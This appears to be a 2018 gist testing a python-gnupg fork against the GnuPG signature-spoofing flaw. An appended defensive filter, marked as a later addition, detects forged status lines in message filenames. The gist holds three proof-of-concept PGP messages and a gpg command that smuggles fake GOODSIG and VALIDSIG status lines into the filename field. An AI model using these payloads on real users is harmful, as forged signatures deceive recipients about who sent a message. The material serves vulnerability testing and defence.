@isislovecruft
Created June 14, 2018 02:23
#!/usr/bin/env python
#
# Test whether python-gnupg (https://github.com/isislovecruft/python-gnupg),
# *not* Vinay Sajip's vulnerable version (https://bitbucket.org/vinay.sajip/python-gnupg/),
# is also vulnerable.
#
# Authors: isis agora lovecruft <isis@patternsinthevoid.net>
from __future__ import print_function
import gnupg
# Set the gnupg log level to `--debug-level=guru` (lmao).
log = gnupg._logger.create_logger(9)
log.setLevel(9)
# Create our gpg instance
gpg = gnupg.GPG(binary="/usr/bin/gpg2")
# Created via (from https://neopg.io/blog/gpg-signature-spoof/):
#
# echo 'Please send me one of those expensive washing machines.' | \
# gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
# \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
# \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
# \n[GNUPG:] TRUST_FULLY 0 classic\
# \ngpg: '\'`" > poc1.msg
poc1msg = '''\
-----BEGIN PGP MESSAGE-----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=UN+a
-----END PGP MESSAGE-----
'''
result1 = gpg.verify(poc1msg)
print("[poc1] Was the spoofed signature valid? %r" % result1.valid)
poc2msg = '''\
-----BEGIN PGP MESSAGE-----
y8BvYv8nCltHTlVQRzpdIEdPT0RTSUcgRjJBRDg1QUMxRTQyQjM2OCBQYXRyaWNr
IEJydW5zY2h3aWcgPHBhdHJpY2tAZW5pZ21haWwubmV0PgpbR05VUEc6XSBWQUxJ
RFNJRyBGMkFEODVBQzFFNDJCMzY4IHggMTUyNzcyMTAzNyAwIDQgMCAxIDEwIDAx
CltHTlVQRzpdIFRSVVNUX0ZVTExZCltHTlVQRzpdIEJFR0lOX0RFQ1JZUFRJT04K
W0dOVVBHOl0gREVDUllQVElPTl9PS0FZCltHTlVQRzpdIEVOQ19UTyBBM0FEQjY3
QTJDREI4QjM1IDEgMApncGc6ICdbIaFeU2VlIHlvdSBhdCB0aGUgc2VjcmV0IHNw
b3QgdG9tb3Jyb3cgMTBhbS4K
=Qs3t
-----END PGP MESSAGE-----
'''
result2 = gpg.decrypt(poc2msg)
print("[poc2] Was the spoofed signature and encryption valid? %r"
      % result2.valid)
poc3msg = '''\
-----BEGIN PGP MESSAGE-----
owJ42m2PsWrDMBiE9zzF1Uu2YDmJZYcQasV2oLRLHegQOij4txC1rGBZQ1+lT9M9
79O5gkAppceNd8d318/H85dxaj5TF7VBo9UgJz8SjGwJR09gCR78gCRmGWK2CU7W
KJ6wr5rjrfRH3ulB4bkp8EbvYDFfVnxViWUmyrRk+Yqne1FnVZGXos5rwVNWpJz/
O6Wd8zQiOuu+v6euW9hRRbfkwdoW7ge3G61B9BJyWhoI3waGyQ7Y/q7uIpw63/ev
mIfLp7vrhyGaYAhyCqDSzL4B9fBP7w==
=zQV0
-----END PGP MESSAGE-----
'''
result3 = gpg.verify(poc3msg)
print("[poc3] Was the spoofed signature valid? %r" % result3.valid)
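
A defensive pre-filter for the case poc2msg exercises, where the message opens with a cleartext Literal Data packet whose filename field carries newline-separated `[GNUPG:]` status lines. This is an added example, not part of the original gist or of python-gnupg: `dearmor`, `literal_filename`, `has_control_bytes`, `check_message` and `SAMPLE` are hypothetical names, and the sample message is constructed. It cannot see a filename that sits inside an encrypted message such as poc1, so it complements a patched GnuPG rather than replacing it.

```python
import base64

def dearmor(text):
    """Decode an ASCII-armored OpenPGP block to its binary packets."""
    lines = [l.strip() for l in text.strip().splitlines()[1:-1]]
    # Skip blank lines, "Key: value" armor headers and the "=XXXX" CRC24 line.
    body = [l for l in lines if l and ":" not in l and not l.startswith("=")]
    return base64.b64decode("".join(body))

def literal_filename(data):
    """Return the filename of a leading Literal Data packet (tag 11), or None."""
    pkt = bytearray(data)
    if len(pkt) < 2 or not pkt[0] & 0x80:
        return None
    if pkt[0] & 0x40:                       # new-format packet header
        tag, first_len = pkt[0] & 0x3F, pkt[1]
        if 192 <= first_len < 224:
            pos = 3                         # two-octet length
        elif first_len == 255:
            pos = 6                         # five-octet length
        else:
            pos = 2                         # one-octet or partial length
    else:                                   # old-format packet header
        tag = (pkt[0] >> 2) & 0x0F
        pos = 1 + (1, 2, 4, 0)[pkt[0] & 3]
    if tag != 11 or len(pkt) < pos + 2:
        return None
    name_len = pkt[pos + 1]                 # pkt[pos] is the data-format octet
    return bytes(pkt[pos + 2:pos + 2 + name_len])

def has_control_bytes(name):
    """True if the name holds bytes able to start a new line in gpg's output."""
    return any(b < 0x20 or b == 0x7F for b in bytearray(name))

def check_message(armored):
    """Return (filename, suspicious) for an armored message, or (None, False)."""
    name = literal_filename(dearmor(armored))
    return name, bool(name) and has_control_bytes(name)

# Constructed sample: literal packet whose filename embeds a fake status line.
_NAME = b"'\n[GNUPG:] GOODSIG 0000000000000000 Constructed Example\ngpg: '"
_BODY = b"b" + bytes(bytearray([len(_NAME)])) + _NAME + b"\x00" * 4 + b"hello\n"
SAMPLE = ("-----BEGIN PGP MESSAGE-----\n\n"
          + base64.b64encode(bytes(bytearray([0xCB, len(_BODY)])) + _BODY).decode()
          + "\n-----END PGP MESSAGE-----\n")

if __name__ == "__main__":
    print(check_message(SAMPLE))
```

A caller would refuse to hand a flagged message to gpg, or at least log the filename with its control bytes escaped.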